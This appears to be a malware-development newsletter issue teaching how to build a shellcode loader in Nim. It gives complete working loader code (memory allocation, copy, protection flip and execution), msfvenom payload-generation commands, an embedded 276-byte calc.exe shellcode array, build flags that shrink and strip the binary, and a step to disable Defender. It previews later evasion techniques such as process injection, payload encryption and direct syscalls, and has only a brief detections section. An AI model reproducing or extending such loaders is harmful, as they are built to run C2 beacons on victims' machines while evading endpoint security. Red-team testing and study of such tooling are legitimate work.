This is the first in a series on building shellcode loaders with Nim. In this one we’ll cover the basics of a shellcode loader and give you everything you need to get started. Over the next several issues we’ll add evasion techniques and process injection, and tighten OPSEC.
Why Maldev?
If we really want to defend an environment, we have to test its controls. Default settings are rarely secure, and the EDR and AV solutions we rely on are often left in a near-default state. Also, maldev is fun. Learning the Windows API without the goal of getting past an EDR would be impossibly boring. I’ll show you the basics of it here. Nothing in this issue should get past an EDR on its own without more work. Defender isn’t an EDR, though, and obfuscating or encrypting your payload before executing it gets you past a lot of its detections with little effort.
Why Nim?
What first brought me to Nim was the name. I thought it was cool and it reminded me of the Rats of NIMH, but there is no relation. It's extremely portable with mingw. I compile Windows binaries from Nim on every platform. The syntax reminds me of Python and it isn't overly verbose.
Shellcode Loaders
A shellcode loader is a tiny program whose only job is to execute shellcode. You’re gonna want one of these when you can execute code on a target. That could be from maldocs, trojans, or an exploit. The shellcode you use is typically a C2 beacon from Cobalt Strike, Sliver, or another framework. These C2s are heavily signatured, so if you write them to disk or they get scanned in memory, you’re gonna fire alerts. The art of shellcode loaders is executing the shellcode in memory without alerting the EDR. We’re going to go over a simple one here in Nim.
import winim/lean
# Replace with your own payload. Generate one with:
# msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
# xxd -i sc.bin
# Placeholder below is a single `ret` so the program exits cleanly.
const shellcode: array[1, byte] = [0xC3.byte]
We have some basic Nim code that will take shellcode from Metasploit and execute it. The first important thing to note is the winim library. It’s the Nim binding for the Windows API, and it’s how we can call the Windows API so easily. winim/lean imports only the core Windows SDK modules and leaves out the shell, OLE, and COM layers, which keeps compile times down.
The shellcode is a placeholder with a single ret. Metasploit can generate raw position-independent shellcode, so we can use it. However, you can’t just copy paste a PE binary into the code. The payload needs to be shellcode that can execute from wherever it lands in memory.
proc main() =
  # 1. Allocate a region of memory we can write to
  let mem = VirtualAlloc(
    nil,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT or MEM_RESERVE,
    PAGE_READWRITE
  )
  if mem == nil:
    echo "alloc failed: ", GetLastError()
    return
Our first step is to allocate some memory with the VirtualAlloc WinAPI call. VirtualAlloc is how we get Windows to give us a region of memory in our own process. It hands us a pointer to a mapped region we control.
The arguments:
nil - The address we want. We don’t care where the region lands, so we let Windows pick.
shellcode.len - How many bytes we need to hold our shellcode. Windows rounds this up to a whole number of pages, which are 4KB each on x64.
MEM_COMMIT or MEM_RESERVE - Windows has two steps for memory allocation: reserving address space, and committing it so it is usable. Passing both flags does the two steps in one call.
PAGE_READWRITE - The protection we want on the page. We need to write the shellcode bytes into it. After the copy, we’ll flip it to executable.
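To make the page rounding concrete, here is a minimal sketch of the arithmetic. The 4096-byte page size is an assumption (the normal small-page size on x64 Windows), and roundUpToPage is a hypothetical helper for illustration, not something winim provides.

```nim
# Assumption: 4 KiB pages, the normal small-page size on x64 Windows.
const pageSize = 4096

proc roundUpToPage(n: int): int =
  ## Round n up to the next multiple of pageSize.
  ((n + pageSize - 1) div pageSize) * pageSize

echo roundUpToPage(1)     # 4096
echo roundUpToPage(276)   # 4096
echo roundUpToPage(4097)  # 8192
```

So asking for 1 byte or 276 bytes costs the same single page.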
  # 2. Copy shellcode into the writable region.
  copyMem(mem, unsafeAddr shellcode[0], shellcode.len)
copyMem is Nim's wrapper around memcpy. It takes a destination pointer, a source pointer, and a byte count, and copies that many bytes from the source to the destination. The destination is the memory we just got from VirtualAlloc.
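If copyMem is new to you, it can be tried on ordinary buffers with no Windows API involved. This is a small sketch; copyBytes is a hypothetical helper name used only for this illustration.

```nim
proc copyBytes(src: openArray[byte]): seq[byte] =
  ## Return a fresh copy of src, made with copyMem.
  result = newSeq[byte](src.len)
  if src.len > 0:
    # Arguments are destination, source, byte count: the same order as memcpy.
    copyMem(addr result[0], unsafeAddr src[0], src.len)

let original = [byte 0xDE, 0xAD, 0xBE, 0xEF]
let copied = copyBytes(original)
doAssert copied == @original
```

The length check matters because indexing element 0 of an empty buffer would be out of bounds.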
  # 3. Flip the page from RW to RX. Now executable, no longer writable.
  var oldProtect: DWORD
  if VirtualProtect(
    mem,
    cast[SIZE_T](shellcode.len),
    PAGE_EXECUTE_READ,
    addr oldProtect
  ) == 0:
    echo "VirtualProtect failed: ", GetLastError()
    return
VirtualProtect changes the protection on the memory we already own. We point it at the region we got from VirtualAlloc and tell it the new protection should be PAGE_EXECUTE_READ (RX: readable and executable, no longer writable). Windows also requires a pointer to a DWORD that receives the old protection value, even if we don't plan to use it. The call fails without one.
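The protection values are just small integer constants. The sketch below declares three of them locally (values as defined in the Windows SDK headers) so it compiles without winim, and shows that the RW to RX sequence never leaves the page writable and executable at the same time. The describe and everRwx helpers are hypothetical names for this illustration.

```nim
# Values as defined in the Windows SDK headers, redeclared here so the
# sketch compiles on any platform without winim.
const
  PageReadWrite        = 0x04'u32  # PAGE_READWRITE
  PageExecuteRead      = 0x20'u32  # PAGE_EXECUTE_READ
  PageExecuteReadWrite = 0x40'u32  # PAGE_EXECUTE_READWRITE

proc describe(prot: uint32): string =
  ## Short human-readable label for a protection constant.
  case prot
  of PageReadWrite: "RW"
  of PageExecuteRead: "RX"
  of PageExecuteReadWrite: "RWX"
  else: "other"

proc everRwx(history: openArray[uint32]): bool =
  ## True if any step in the history was writable and executable at once.
  for p in history:
    if p == PageExecuteReadWrite:
      return true
  false

# The sequence our loader goes through: allocate RW, then flip to RX.
let loaderHistory = [PageReadWrite, PageExecuteRead]
echo describe(loaderHistory[0]), " -> ", describe(loaderHistory[1])  # RW -> RX
doAssert not everRwx(loaderHistory)
```

Allocating RWX in one shot would be less code, but pages that are writable and executable together are a well-known thing for defenders to look for.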
  # 4. Cast the memory address to a function pointer and call it.
  let fn = cast[proc() {.cdecl.}](mem)
  fn()
main()
mem is the address that points to our shellcode. The cast allows us to call this as a function. This will execute the shellcode.
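The cast itself can be seen in isolation with a normal Nim proc instead of shellcode. This is a minimal sketch: answer is a hypothetical proc, and we round-trip its address through an untyped pointer the same way the loader treats mem.

```nim
proc answer(): cint {.cdecl.} =
  ## An ordinary compiled proc standing in for "code at some address".
  42

# Forget the type: all we keep is a raw address.
let raw = cast[pointer](answer)

# Tell the compiler what calling convention and signature live at that address.
let fn = cast[proc(): cint {.cdecl.}](raw)

doAssert fn() == 42
```

The compiler takes our word for the signature, so a wrong calling convention or return type here fails at runtime, not at compile time.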
Ok, now it’s time to build it. Since this is Nim, we can compile this anywhere.
For Windows:
nim c -d:release loader.nim
Cross-compiling from Linux or macOS
All we need to cross-compile is the mingw toolchain. Once it is installed, we pass -d:mingw and Nim builds for Windows targets.
# Ubuntu / Debian
sudo apt install mingw-w64
# macOS
brew install mingw-w64
# Cross-compile to Windows x64
nim c -d:mingw -d:release --cpu:amd64 loader.nim
Yay it works. Now let’s do something useful. Let’s generate calc.exe shellcode with msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin, then xxd -i sc.bin to get the C array form.
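xxd -i prints a C array, so the bytes still need to be reshaped into Nim syntax. Doing that by hand works; the sketch below is one way to automate the formatting. toNimArray is a hypothetical helper, and the const name it emits simply mirrors the one used in this issue.

```nim
import std/strutils

proc toNimArray(data: openArray[byte], perLine = 8): string =
  ## Format raw bytes as a Nim array literal, perLine bytes per row.
  result = "const shellcode: array[" & $data.len & ", byte] = [\n"
  for i, b in data:
    if i mod perLine == 0:
      result.add "  "
    if i == 0:
      result.add "byte "          # type the first element; the rest follow it
    result.add "0x" & toHex(b).toLowerAscii
    if i < data.high:
      result.add ","
    if i mod perLine == perLine - 1 or i == data.high:
      result.add "\n"
    else:
      result.add " "
  result.add "]"

echo toNimArray([byte 0xfc, 0x48, 0xc3])
```

Only the first element carries the byte prefix; Nim infers the element type for the rest of the literal from it.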
Putting it all together: shellcode loader with calc
import winim/lean
# msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o sc.bin
# xxd -i sc.bin
const shellcode: array[276, byte] = [
byte 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52,
0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7,
0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41,
0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed,
0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b,
0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88,
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67,
0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44,
0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56,
0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48,
0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1,
0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24,
0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44,
0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41,
0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49,
0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a,
0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83,
0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41,
0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff,
0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d,
0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b,
0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2,
0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c,
0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47,
0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89,
0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e,
0x65, 0x78, 0x65, 0x00
]
proc main() =
  # 1. Allocate RW only. No execute bit yet.
  let mem = VirtualAlloc(
    nil,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT or MEM_RESERVE,
    PAGE_READWRITE
  )
  if mem == nil:
    echo "alloc failed: ", GetLastError()
    return
  # 2. Copy shellcode into the writable region.
  copyMem(mem, unsafeAddr shellcode[0], shellcode.len)
  # 3. Flip the page to RX. Now executable, no longer writable.
  var oldProtect: DWORD
  if VirtualProtect(
    mem,
    cast[SIZE_T](shellcode.len),
    PAGE_EXECUTE_READ,
    addr oldProtect
  ) == 0:
    echo "VirtualProtect failed: ", GetLastError()
    return
  # 4. Cast and call.
  let fn = cast[proc() {.cdecl.}](mem)
  fn()
main()
Here we need to disable Defender on the test machine. The shellcode as generated by msfvenom is detected by Defender, which will eat our compiled binary.
And let’s change our compile options to make our executable smaller and strip out what we don’t need.
# Windows
nim c -d:danger -d:strip --opt:size --passC:-flto --passL:-flto loader.nim
# Linux & macOS
nim c -d:mingw -d:danger -d:strip --opt:size --passC:-flto --passL:-flto --cpu:amd64 loader.nim
-d:mingw - Use mingw to compile to Windows.
-d:danger - Turn off all runtime safety checks (bounds, overflow, nil deref). Implies -d:release.
-d:strip - Strip debug info and symbol tables.
--opt:size - Optimize for binary size instead of speed.
--passC:-flto - Pass -flto to the C compiler to enable link-time optimization.
--passL:-flto - Pass -flto to the linker as well, which lets it drop unused code across compilation units.
--cpu:amd64 - Produce x64 output. It's the default on a 64-bit Windows host, so it's omitted there. Pass it explicitly when cross-compiling so the target architecture doesn't depend on the build host and we don't end up with a binary that can't run x64 shellcode.
Once we’ve done that we can execute.

calc executes from loader.
Before we wrap up, run strings against the compiled binary:
gat0r@bast:/mnt/c/loader$ strings loader.exe | grep VirtualAlloc
VirtualAlloc
VirtualAlloc
VirtualAlloc shows up twice. PE binaries store imported function names in the import table by default. The OS loader needs them to resolve the actual addresses at process startup, so stripping doesn't touch them.
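What strings does is simple enough to sketch: walk the bytes and report every run of printable ASCII above a minimum length. The version below is a simplified illustration, not a reimplementation of the real tool, and printableRuns and the sample bytes are made up for the example.

```nim
proc printableRuns(data: openArray[byte], minLen = 4): seq[string] =
  ## Collect runs of printable ASCII that are at least minLen long.
  var cur = ""
  for b in data:
    if b >= 0x20 and b <= 0x7e:
      cur.add char(b)
    else:
      if cur.len >= minLen:
        result.add cur
      cur.setLen 0
  if cur.len >= minLen:
    result.add cur

# Made-up bytes shaped like a slice of an import table: NUL-terminated names.
let sample = "\x00\x01VirtualAlloc\x00xy\x00KERNEL32.dll\x00"
echo printableRuns(toOpenArrayByte(sample, 0, sample.high))
# @["VirtualAlloc", "KERNEL32.dll"]
```

The API name falls out with no knowledge of the PE format at all, which is why import names are such cheap signal for an analyst.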
We can confirm with objdump:
gat0r@bast:/mnt/c/loader$ x86_64-w64-mingw32-objdump -p loader.exe | grep -A 20 "DLL Name: KERNEL32"
DLL Name: KERNEL32.dll
vma: Hint/Ord Member-Name Bound-To
2271c 20 AddVectoredExceptionHandler
2273a 141 CloseHandle
22748 197 CreateEventA
22758 243 CreateSemaphoreA
2276c 283 DeleteCriticalSection
22784 313 DuplicateHandle
22796 319 EnterCriticalSection
227ae 443 FreeLibrary
227bc 552 GetCurrentProcess
227d0 553 GetCurrentProcessId
227e6 556 GetCurrentThread
227fa 557 GetCurrentThreadId
22810 627 GetHandleInformation
22828 630 GetLastError
22838 651 GetModuleHandleA
2284c 710 GetProcAddress
2285e 711 GetProcessAffinityMask
22878 743 GetStartupInfoA
2288a 769 GetSystemTimeAsFileTime
objdump is part of binutils. The x86_64-w64-mingw32- prefixed build used here comes with the mingw-w64 toolchain. On Windows you can use dumpbin /imports loader.exe from a Visual Studio command prompt, or PE-Studio if you prefer a GUI.
Most of those imports aren't from our code. We never called AddVectoredExceptionHandler, CreateSemaphoreA, or EnterCriticalSection. Those come from the Nim runtime, the bits Nim links into every compiled binary to handle threading, exceptions, and memory management. Even our small loader drags this whole import set along with it. A Nim binary's import table is a pretty distinctive fingerprint, and detection engineers have noticed.
This is what an analyst sees in the first 30 seconds of examining your binary. PE-Studio, CFF Explorer, and most automated tools lead with the import table. These API names give away the behavior of the binary.
Hiding API names from static analysis is solvable. You can resolve them at runtime via LoadLibrary and GetProcAddress, or skip the names entirely with hash-based resolution. We'll get there in a future issue.
Detections & Mitigations
Defensive Tools & Detections:
YARA. Signatures targeting the embedded msfvenom shellcode stub will fire on the bytes sitting in the binary regardless of how we load them.
AV static scanning. Will flag known msfvenom payloads on disk before the loader ever runs, since the bytes are in the binary in plaintext.
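To see why plaintext bytes are so easy to catch, here is a minimal sketch of the defender's side: a plain byte-pattern search. The pattern is just the first six bytes of the calc payload shown earlier in this issue. It is an illustration of the idea, not a real YARA rule or a production signature, and findPattern is a hypothetical helper.

```nim
proc findPattern(data, pattern: openArray[byte]): int =
  ## Index of the first occurrence of pattern in data, or -1 if absent.
  result = -1
  if pattern.len == 0 or pattern.len > data.len:
    return
  for i in 0 .. data.len - pattern.len:
    var hit = true
    for j in 0 ..< pattern.len:
      if data[i + j] != pattern[j]:
        hit = false
        break
    if hit:
      return i

# First six bytes of the payload embedded in the loader above.
let stubStart = [byte 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8]

# Stand-in for file contents: two unrelated bytes, then the stub.
let fileBytes = [byte 0x00, 0x90, 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0]

echo findPattern(fileBytes, stubStart)  # 2
```

A scanner doing this never has to run the binary, so how we load the shellcode makes no difference to it.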
Alright, we’ve written a short shellcode loader that demonstrates the concepts needed to move forward. It will get flagged by Defender for the msfvenom payload. Even if it didn’t, the import table might give us away on static analysis. Next issue we’ll move out of our own process and run code in someone else’s with process injection. We’ll also encrypt or encode our payload so it isn’t immediately eaten. After that come suspended process targets, callback function abuse, Early Bird APC, and direct syscalls. Each issue will close off more detection paths, and by the end of the series we’ll have a loader and you’ll understand the OPSEC tradeoffs we make at each step.
If you found this useful, forward it to someone who’d actually read it.
Got questions, corrections, or want to argue about something? Just hit reply. I read everything.
— Jeff
